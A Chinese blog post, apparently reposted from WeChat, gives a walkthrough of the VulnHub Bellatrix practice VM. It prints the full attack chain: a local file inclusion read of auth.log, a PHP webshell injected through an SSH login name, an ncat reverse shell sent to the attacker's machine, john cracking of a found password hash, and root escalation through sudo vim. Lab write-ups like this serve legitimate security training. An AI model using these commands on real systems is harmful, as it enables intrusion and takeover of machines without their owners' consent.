vulnhub之Bellatrix的实践

admin 2022年7月30日22:50:04评论18 views字数 946阅读3分9秒阅读模式

今天实践的是vulnhub的Bellatrix镜像,

下载地址,https://download.vulnhub.com/hogwarts/Bellatrix.ova,

用workstation导入成功,进行地址扫描,拿到地址192.168.58.143,

vulnhub之Bellatrix的实践

接着进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.143,

vulnhub之Bellatrix的实践

看到有http服务,浏览器访问主页,发现提示php页面,

vulnhub之Bellatrix的实践

再查看源码,提示了文件包含漏洞,

vulnhub之Bellatrix的实践

通过文件包含漏洞查看ssh登录日志文件,

http://192.168.58.143/ikilledsiriusblack.php?file=/var/log/auth.log,

vulnhub之Bellatrix的实践

向ssh登录日志文件里注入webshell,

ssh '<?php system($_GET['c']); ?>'@192.168.58.143,

再次查看ssh登录日志文件,是看不到已经注入的webshell的,

vulnhub之Bellatrix的实践

但其实是注入成功的,后来拿到shell后直接查看ssh登录日志文件就能看到,

vulnhub之Bellatrix的实践

kali攻击机上开启反弹shell监听,nc -lvp 4444,

利用webshell制造反弹shell

http://192.168.58.143/ikilledsiriusblack.php?file=/var/log/auth.log&c=ncat -e /bin/bash  192.168.58.131 4444,

kali攻击机上得到反弹shell,不是root,需要提权,转成交互式shell,

python3 -c 'import pty; pty.spawn("/bin/bash")',

从当前账户文件里发现了一个账户和密码的hash,

vulnhub之Bellatrix的实践

在kali攻击机上使用john破解,

sudo john --wordlist=/usr/share/john/password.lst hash,

得到账户密码,lestrange/ihateharrypotter,

vulnhub之Bellatrix的实践

切到lestrange账户下,再sudo -l发现vim是root权限的,

老办法,查找vim的提权方法,

vulnhub之Bellatrix的实践

提权,sudo vim -c ':!/bin/sh',成功,id确认是root,

vulnhub之Bellatrix的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Bellatrix的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月30日22:50:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Bellatrix的实践http://cn-sec.com/archives/1211300.html

发表评论

匿名网友 填写信息